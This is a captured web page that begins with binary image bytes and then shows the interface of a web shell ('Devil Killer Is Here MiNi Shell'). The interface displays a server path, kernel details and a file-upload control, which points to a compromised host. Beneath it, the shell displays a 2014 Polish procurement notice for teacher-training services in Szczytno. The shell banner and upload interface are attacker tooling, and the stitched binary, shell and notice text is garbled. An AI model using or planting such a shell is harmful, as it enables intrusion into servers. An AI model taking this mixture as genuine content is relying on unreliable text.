JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140224/35947-N-2014.html

<p class="kh_header"><b>Szczytno: Świadczenie usług szkoleniowych w ramach projektu pn. Nowatorski system wsparcia nauczycieli w powiecie szczycieńskim</b><br>
<b>Numer ogłoszenia: 35947 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Lanca 10, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 89 624 25 92, faks 89 624 25 92.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych w ramach projektu pn. Nowatorski system wsparcia nauczycieli w powiecie szczycieńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Świadczenie usług szkoleniowych w ramach projektu pn. Nowatorski system wsparcia nauczycieli w powiecie szczycieńskim zwanego dalej projektem, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół. dla 36 placówek (szkół i przedszkoli) na terenie Powiatu Szczycieńskiego.
Obszar tematyczny szkoleń obejmuje następujące tematy:
1. Techniki uczenia się i metody motywujące do nauki
2. Rodzice są partnerami szkoły - przedszkola
3. Praca z uczniem o specjalnych potrzebach edukacyjnych
4. Efektywna organizacja pracy zespołów nauczycielskich
5. Ocenianie kształtujące
6. Nauczyciel 45 +
7. Budowa koncepcji pracy szkoły
8. Postawy uczniowskie. Jak je kształtować?
9. Uczeń - aktywny uczestnik procesu uczenia się.
10. Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny internet
11. Skuteczne sposoby zachęcania uczniów do czytania
12. Jak rozwijać twórcze myślenie uczniów?
13. Jak radzić sobie ze szkolną absencją? - bezpieczeństwo w szkole
14. Pozapedagogiczne obowiązki dyrektora szkoły.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 41.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna dysponowanie potencjałem kadrowym niezbędnym do realizacji zamówienia tj. Minimum 1 osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj:  - posiada wykształcenie wyższe II stopnia;
Zamawiający uzna, za spełniony powyższy warunek, jeżeli wykonawca w zakresie dysponowania osobami przedstawi wykaz  osób, które będą uczestniczyć w wykonywaniu zamówienia (zgodnie z zał. nr 4 do SIWZ) oraz złoży oświadczenie o posiadaniu uprawnień przez te osoby (zgodnie z zał. nr  5 do SIWZ).
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 1 do SIWZ. Formularz musi być podpisany przez osobę/osoby uprawnione do składania oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy z podaniem ceny za każdą część zamówienia, przedmiotu zamówienia.
2)	Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3)	Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału, zawartych 
w ust. 1. nastąpi na podstawie wymaganych i załączonych przez wykonawcę do oferty oświadczeń i dokumentów, wymienionych w rozdziale 6 SIWZ. Z oświadczeń i dokumentów  musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. 
4)	Jeżeli wykonawca wykaże, że spełnia warunki udziału w postępowaniu, o których mowa w ust. 1. polegając na innym podmiocie, niezależnie od charakteru prawnego łączącego go z nim stosunków, a nie udowodni, iż będzie dysponował zasobami niezbędnymi na czas realizacji części zamówienia, zamawiający wykluczy wykonawcę z postępowania o udzielenie zamówienia w oparciu o przesłankę zawartą w art. 24 ust. 2 pkt 4 ustawy Pzp. 
5)	Wykonawca ubiegający się o udzielenie zamówienia publicznego wykaże, że brak jest podstaw do jego wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy. Ocena tego warunku nastąpi na podstawie załączonych do oferty przez wykonawcę oświadczeń i dokumentów, wymienionych w Rozdziale 6. SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia braku podstaw niespełnienia warunku z art. 24 ust. 1, spowoduje wykluczenie wykonawcy z postępowania na mocy art. 24 ust. 1 lub art. 24 ust. 2 pkt 4,, lub art. 24 ust 2. pkt 5, lub art. 24b ust. 3  po wyczerpaniu czynności wezwania do uzupełnienia.
6)	Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z treścią art. 24 ust. 4 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że postanowienia umowy mogą zostać zmienione w następującym zakresie:
1.	Zmniejszenie ilości zamówienia - wynikające z faktu, iż realizacja tej części stała się dla Zamawiającego nieuzasadniona społecznie lub ekonomicznie. 
2.	Zmniejszenie wynagrodzenia z powodu ograniczenia zamówienia ze względu na interes publiczny, co nie było do przewidzenia w dniu zawarcia umowy
3.	Zmiana VAT lub stawek celnych
4.	Zmiana prawa mająca wpływ na termin lub zakres zamówienia

Pozostałe dopuszczalne zmiany umowy:
1.	zmiany w zakresie zmiany podwykonawców (jeżeli wystąpią) w przypadku:
2.	rezygnacji podwykonawcy,
3.	zmiany wartości lub zakresu usług wykonywanych przez podwykonawców.
Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.
Warunki zmian:
   -   inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
   -   uzasadnienie zmian- prawidłowa realizacja przedmiotu umowy, 
   -   forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_szczycienski<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno - Pedagogiczna; 12-100 Szczytno ; ul. Lanca 10
Biuro projektu, Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2014 godzina 10:00, miejsce: Poradnia Psychologiczno - Pedagogiczna; 12-100 Szczytno ; ul. Lanca 10
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny z Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gimnazjum Nr 1 im. Henryka Sienkiewicza w Szczytnie - Grupa I i II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki.
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nowoczesne metody, techniki uczenia się i zapamiętywania.
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się
Aktywizujące metody nauczania- szczegółowe i praktyczne, przepracowanie, wybranych metod, przystosowanie do możliwości uczniów o zróżnicowanym poziomie.
Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gimnazjum z Oddziałami Integracyjnymi Nr 2 im. Polskich Olimpijczyków w Szczytnie - Grupa I i II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nabycie przez nauczycieli umiejętności właściwego doboru czynników motywujących w zależności od ucznia, sytuacji, kontekstu.
Wypracowanie w zespołach nauczycielskich katalogu sposobów motywowania uczniów.
Nowoczesne metody, techniki uczenia się i zapamiętywania. Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
Opracowanie wspólnego scenariusza lekcji wychowawczej na temat technik uczenia się, z możliwością dopasowania do poszczególnych przedmiotów.
Aktywizujące metody nauczania. - szczegółowe i praktyczne, przepracowanie wybranych metod, przystosowanie do możliwości uczniów o zróżnicowanym poziomie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gimnazjum im. Krzysztofa Klenczona w Dźwierzutach - Grupa I i II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Podniesienie umiejętności nauczycieli w zakresie doboru czynników motywujących ucznia w zależności od różnych sytuacji oraz wdrażania do praktyki szkolnej metod i technik nauczania.
Motywowanie uczniów do nauki z naciskiem na uczniów z trudnościami w nauce.
Wdrażanie metod aktywizujących w całym zespole klasowym.
Nowoczesne metody, techniki uczenia się i zapamiętywania, odpowiedni dobór do celów i potrzeb uczniów. Jak przeprowadzić diagnozę sposobów uczenia się uczniów narzędzia? 
Wypracowanie scenariusza warsztatu,ów dla rodziców uczniów klas I-III na temat: Wspieranie i motywowanie dzieci do uczenia się. 
Praca metodą projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Publicznego Gimnazjum w Pasymiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania podczas pracy na lekcji.
Poznanie sposobów wpływania na motywację wewnętrzną i zewnętrzną , własną i uczniów.
Nowoczesne metody, techniki uczenia się i zapamiętywania. Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gimnazjum im. ks. Jana Twardowskiego w Rozogach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Motywowanie uczniów do pracy:
- wzbogacenie warsztatu pracy o nowe techniki i metody motywowania uczniów możliwe do wykorzystania w licznym zespole klasowym;
- umiejętność  właściwego doboru czynników motywujących w zależności od ucznia, kontekstu, sytuacji;
- umiejętność wzbudzenia większego zainteresowania uczniów przedmiotem;
- umiejętność  wzbudzenia u uczniów chęci samodzielnego rozwiązywania problemów;
- ułatwienie realizacji treści nauczania;
- pobudzenie własnej motywacji do pracy.
Techniki uczenia się:
- poszerzenie warsztatu pracy nauczycieli w zakresie technik nauczania.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gimnazjum im. Jana Pawła II w Wielbarku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Wdrażanie do praktyki szkolnej metod i technik nauczania. Umiejętności doboru czynników motywujących ucznia w zależności od różnych sytuacji.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nowoczesne metody aktywizujące, techniki uczenia się i zapamiętywania. 
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się.
Aktywizujące metody nauczania- szczegółowe i praktyczne, przepracowanie wybranych metod, przystosowanie do możliwości uczniów o zróżnicowanym poziomie w zależności od ucznia, sytuacji, kontekstu.
Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej Nr 6 im. Orła Białego w Szczytnie - Grupa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Wdrażanie metod aktywizujących w całym zespole klasowym uczniów- nauczyciele klas I-III.
Nowoczesne metody, techniki uczenia się i zapamiętywania, odpowiedni dobór do celów i potrzeb uczniów. Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia? - nauczyciele klas I-III.
Wypracowanie scenariusza warsztatu,ów dla rodziców uczniów klas I-III na temat: Wspieranie i motywowanie dzieci do uczenia się.
Nabycie umiejętności wzbudzenia większego zainteresowania uczniów przedmiotem oraz wzbudzenia u uczniów chęci samodzielnego rozwiązywania problemów.
Nabycie przez nauczycieli umiejętności właściwego doboru metod motywujących w zależności od ucznia, kontekstu, sytuacji.
Motywowanie uczniów do nauki wzbogacenie warsztatu pracy o nowe techniki i metody motywowania uczniów możliwe do wykorzystania w licznym zespole klasowym.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej Nr 6 im. Orła Białego w Szczytnie - Grupa II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Motywowanie uczniów do nauki z naciskiem na uczniów z trudnościami w nauce wzbogacenie warsztatu pracy o nowe techniki i metody motywowania uczniów możliwe do wykorzystania w licznym zespole klasowym - nauczyciele klas IV-VI.
Wdrażanie metod aktywizujących w całym zespole klasowym uczniów- nauczyciele klas IV-VI.
